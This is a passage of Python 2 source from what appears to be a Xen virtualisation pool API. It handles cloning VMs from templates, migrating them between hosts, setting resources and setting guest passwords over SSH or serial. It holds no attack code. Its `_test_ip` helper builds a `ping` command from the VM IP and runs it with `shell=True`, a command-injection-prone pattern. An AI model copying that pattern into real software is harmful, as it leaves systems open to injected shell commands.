log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref) # reason here is pre-fixed
log.debug("Finished change host on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return xen_api_success(True)
except Exception, exn:
log.exception(exn)
return xen_api_error(['CHANGE_HOST_ON_FAILED,', exn])
# finally:
# if path:
# cmd = 'rm -f %s' % path
# doexec(cmd)
'''
1.clone vm on the same host of template
2.migrate vm to the destinate host
3.destroy origin vm
'''
def VM_create_on_from_template(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@author: wuyuewen
@summary: 1. Clone VM from template on the same Host
2. Migrate VM to destinate Host, if migrate success, destroy origin VM on origin Host.
3. Start VM and set VM password, if start VM failed, VM will destroy.
@precondition: 1. Storage has enough space, template structure is legal. See VM_clone_MAC
2. See VM_change_host.
3. Destinate Host has enough free memory, VM already installed Agent for password change. See VM_set_config.
@param session: session of RPC.
@param host_ref: destinate Host
@param vm_ref: VM's uuid
@param newname: name of new VM
@param config: dict type config
@param ping: True | False, VM installed Agent.
True: VM boot into OS then method return
False: VM excute start option and resturn.
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED, create vm from template error
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if mac_addr and not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
# self.__vm_change_host_lock__.acquire()
# try:
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
# finally:
# self.__vm_change_host_lock__.release()
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_on_from_template<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_error(['create vm from template error: %s' % exn])
finally:
if path:
st1 = time.time()
cmd = 'rm -f %s' % path
doexec(cmd)
e1 = (time.time() - st1)
log.debug('remove %s cost: %s' %(path, e1))
# finally:
# self.__vm_clone_lock__.release()
def VM_create_from_template(self, session, vm_ref, newname, config):
'''
@deprecated: not used
'''
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config) # when set config failed, VM will be deleted!
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
def VM_create_with_VDI(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@deprecated: not used
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
storage = self._get_BNStorageAPI_instance()
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_new_uuid = config.get('vdiUuid', None)
st1 = time.time()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis and vdi_new_uuid:
vdi_uuid_map[sys_vdi] = vdi_new_uuid
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid, True)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid, True)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_with_VDI<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
# finally:
# self.__vm_clone_lock__.release()
def VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_passwd", vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
else:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
def _VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type ):
'''
@author: wuyuewen
@summary: Internal method. VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
#log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, origin_passwd, passwd, vm_type))
# by henry
log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, "********", "********", vm_type))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('vm(%s) ip(%s) cannot ping, try one more time...' % (vm_ref, vm_ip))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('Finally, vm(%s) ip(%s) cannot ping' % (vm_ref, vm_ip))
return xen_api_success(False)
proxy = xmlrpclib.Server("http://127.0.0.1:10086")
flag = proxy.VM_set_passwd(vm_ip, passwd, origin_passwd, vm_type)
return xen_api_success(flag)
def VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
@summary: Contain several options:
1. set vm vcpu and memory.
2. start vm.
3. ping vm to check if start.
4. set password use SSH protocol or Serial device.
@precondition: Every option has an error handling or rollback option.
1. set vm vcpu and memory error, vm destroy
2. vm cannot start, vm destroy
3. vm cannot ping, vm do not get ip, return error and remain vm to check
4. vm cannot set passwd, return error and remain vm to check
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
@param ping: True | False, ping or donnot ping after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
log.debug("Starting VM_set_config...")
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
log.debug('Master node...')
response = self._VM_set_config(session, vm_ref, config, ping)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_config", vm_ref, config, ping)
return response
else:
response = self._VM_set_config(session, vm_ref, config, ping)
return response
def _VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
@summary: Internal method. Contain several options:
1. set vm vcpu and memory.
2. start vm.
3. ping vm to check if start.
4. set password use SSH protocol or Serial device.
@precondition: Every option has an error handling or rollback option.
1. set vm vcpu and memory error, vm destroy
2. vm cannot start, vm destroy
3. vm cannot ping, vm do not get ip, return error and remain vm to check
4. vm cannot set passwd, return error and remain vm to check
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
@param ping: True | False, ping or donnot ping after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
time_log = {}
log.debug('vm set config')
MB = 1024*1024
vcpu_num = int(config.get('cpuNumber', 1))
memory_value = int(config.get('memoryValue', 1024))*MB
vlanid = config.get('vlanId', '-1')
IO_read_limit = int(config.get('IOreadLimit', 30))
IO_write_limit = int(config.get('IOwriteLimit', 100))
vm_passwd = config.get('passwd', '')
origin_passwd = config.get('origin_passwd', '')
vm_ip = config.get('IP', '')
vm_type = config.get('type', 'linux')
try:
st1 = time.time()
#1. set cup and memeory
vcpu_max = self._VM_get_VCPUs_max('', vm_ref).get('Value')
if vcpu_num > vcpu_max:
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
elif vcpu_num < vcpu_max:
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
memory = int(self._VM_get_memory_static_max(session, vm_ref).get('Value'))
log.debug('memory: %s' % memory)
if memory > memory_value:
#log.debug('memory > memory_value: --> %s > %s' % (memory, memory_value))
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
self._VM_set_memory_static_max(session, vm_ref, memory_value)
elif memory < memory_value:
#log.debug('memory < memory_value: --> %s < %s' % (memory, memory_value))
self._VM_set_memory_static_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
#2. set vlanid
#self._VM_set_tag_by_ethnum(session, vm_ref, 0, vlanid)
#log.debug('set tag in other config:>>>>>>>>>>>>>>>>')
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag']['0'] = vlanid
#self._VM_save(dominfo)
#3. set IO limit
self._VM_set_IO_rate_limit(session, vm_ref, 'write', IO_write_limit, 'MBps')
e1 = time.time() - st1
time_log['set config'] = e1
log.debug('4. finish set vm(%s) vcpu,memeory and io rate limit' % vm_ref)
log.debug('====set vm(%s) vcpu,memeory and io rate limit cost time: %s=======' % (vm_ref, e1))
except Exception, exn:
log.error(exn)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM set config error'])
try:
#5. start vm
# st2 = time.time()
log.debug('5. excute start vm>>>>>>>>>>>>>>>>>>')
start_status = self._VM_start(session, vm_ref, False, True).get('Status')
if start_status == 'Failure':
self._VM_destroy(session, vm_ref, True) # start failed, vm destroy
log.debug('6. vm start failed>>>>>>>>> return')
return xen_api_error('vm(%s) start error' % vm_ref)
is_setPasswd = False
if vm_ip:
if ping:
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
if is_on and vm_passwd and origin_passwd:
set_passwd = threading.Thread(target=self._set_passwd, name='set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd, name='check_start_and_set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
check_start_and_set_passwd.start()
else:
log.debug('Start VM and change passwd using serial.')
if ping:
timeout = 120
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
if is_on and vm_passwd:
set_passwd = threading.Thread(target=self._set_passwd_via_serial, name='set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd_via_serial, name='check_start_and_set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
check_start_and_set_passwd.start()
# finally:
# self.__set_passwd_lock__.release()
#6. get record of VM
st4 = time.time()
VM_record = self._VM_get_record(session, vm_ref).get('Value')
if VM_record and isinstance(VM_record, dict):
VM_record['setpasswd'] = is_setPasswd
e4 = time.time() - st4
e5 = time.time() - st1
time_log['get record'] = e4
time_log['total'] = e5
log.debug('return vm record----> %s' % VM_record)
log.debug('8.vm create from template Succeed!>>>>>>>>>>')
log.debug('===vm(%s) set config cost time===' % vm_ref)
# time_log['set config'] = e1
# time_log['load os'] = e2
# time_log['set passwd'] = e3
if time_log.get('set config', ''):
log.debug('set vm vcpu,memeory and io rate limit cost time: %s' % e1)
# if time_log.get('load os', ''):
# log.debug('vmstart and load OS cost time: %s' % e2)
# if time_log.get('set passwd'):
# log.debug('vm set passwd cost time: %s' % e3)
if time_log.get('get record'):
log.debug('vm get record cost time: %s' % e4)
if time_log.get('total'):
log.debug('>>>>Total time<<<<: %s' % e5)
log.debug('=====vm(%s) end=====' % (vm_ref))
return xen_api_success(VM_record)
except Exception, exn:
log.error(exn)
if isinstance(exn, VMBadState):
return xen_api_error(['VM start error, bad power state.'])
log.error('9.vm create error....shutdown and remove vm(%s)' % vm_ref)
self._VM_hard_shutdown(session, vm_ref)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM start and change password error'])
def _check_start_and_set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd and origin_passwd:
# self.__set_passwd_lock__.acquire()
# try:
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _check_start_and_set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 200
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd:
# self.__set_passwd_lock__.acquire()
# try:
# st3 = time.time()
self._set_passwd_via_serial(session, vm_ref, vm_passwd, vm_type)
# log.debug("7. set passwd via serial result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
# if not is_setPasswd:
# log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
# e3 = time.time() - st3
# log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# test if ping ip return true
def _test_ip(self, ip, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
import os
import subprocess
import datetime
time1 = datetime.datetime.now()
cmd = "ping -w %s %s" % (deadline, ip)
re = subprocess.call(cmd, shell=True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s result: %s, cost time: %s' %(ip, re, str(t)))
if re:
return False
else:
return True
def _set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
if cmp(vm_type, 'linux') == 0:
userName = 'root'
else:
userName = 'Administrator'
json_obj = json.dumps({'requestType':'Agent.SetPassword', 'userName':userName, 'password':vm_passwd})
is_setPasswd = Netctl.serial_opt(ip, port, json_obj, False)
log.debug("7. set passwd via serial, result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
def _VM_start_checkout(self, vm_ip, timeout = 60, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
cnt = 0
while cnt < timeout:
if self._test_ip(vm_ip, deadline):
return True
# time.sleep(1)
cnt += 1
log.debug('vm not start>>>>>')
return False
def _VM_start_checkout_via_serial(self, session, vm_ref, timeout = 60):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
json_obj = json.dumps({'requestType':'Agent.Ping'})
log.debug(json_obj)
if self._test_serial(ip, port, json_obj, timeout):
return True
# cnt = 0
# while cnt < timeout:
# if self._test_serial(ip, port, json_obj):
# return True
## time.sleep(1)
# cnt += 1
log.debug('vm not start>>>>>')
return False
def _test_serial(self, ip, port, json_obj, timeout):
'''
@author: wuyuewen
@summary: Internal method.
'''
import datetime
time1 = datetime.datetime.now()
re = Netctl.serial_opt(ip, port, json_obj, False, timeout, True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s:%s result: %s, cost time: %s' %(ip, port, re, str(t)))
return re
'''
generate template from vm
1. vm_clone
2. set template
return True or False
'''
def VM_create_image(self, session, vm_ref, template_name, template_uuid):
'''
@author: wuyuewen
@summary: Generate template from VM, contain several options:
1. vm_clone
2. set template
@param session: session of RPC.
@param vm_ref: VM's uuid
@param template_name: new template name.
@param template_uuid: template uuid
@return: True | False
@rtype: dict.
'''
log.debug('==========vm(%s) create template==========' % vm_ref)
result = False
try:
response = self.VM_clone(session, vm_ref, template_name, None, template_uuid)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
assert domuuid == template_uuid
log.debug('new VM uuid:%s' % domuuid)
self.VM_set_is_a_template(session, template_uuid, True)
result = True
except Exception, exn:
log.exception(exn)
self.VM_destroy(session, template_uuid, True)
finally:
log.debug('============end===============')
return xen_api_success(result)
def VM_clone(self, session, vm_ref, newname, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Internal method. Clone VM, contain several options:
1. get origin VM's VDIs
2. clone VM
3. if clone VM success, clone VDIs
@param session: session of RPC.
@param vm_ref: origin VM's uuid
@param newname: new VM's name
@param vdi_uuid_map: origin VM's VDIs mapping to new clone VDIs
@param newuuid: new VM's uuid
@param vdi_exists: True | False, if new VDIs exist or not(create in advance).
@return: True | False
@rtype: dict.
'''
log.debug('in VM_clone')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parrent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local', vm_ref, newname, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone', vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
log.debug('New domain uuid: %s' % domuuid)
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
# log.debug("return from async")
return response
else:
log.debug('in VM_clone local')
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local(session, vm_ref, newname, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone local, else')
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
log.debug('in _VM_clone')
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100, xendom.domain_clone, vm_ref, newname,\
vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
'''
when clone a VM, need to pass the MAC value
'''
def VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Clone VM with param MAC.
@see VM_clone
'''
log.debug('in VM_clone with MAC...')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parrent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
# log.debug("update pool data structs before clone!!!")
# BNPoolAPI.update_data_struct("vm_clone", newuuid, h_ref)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# log.debug('New domain uuid: %s' % domuuid)
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if cmp(response.get('Status'), 'Success') == 0:
domuuid = response.get('Value')
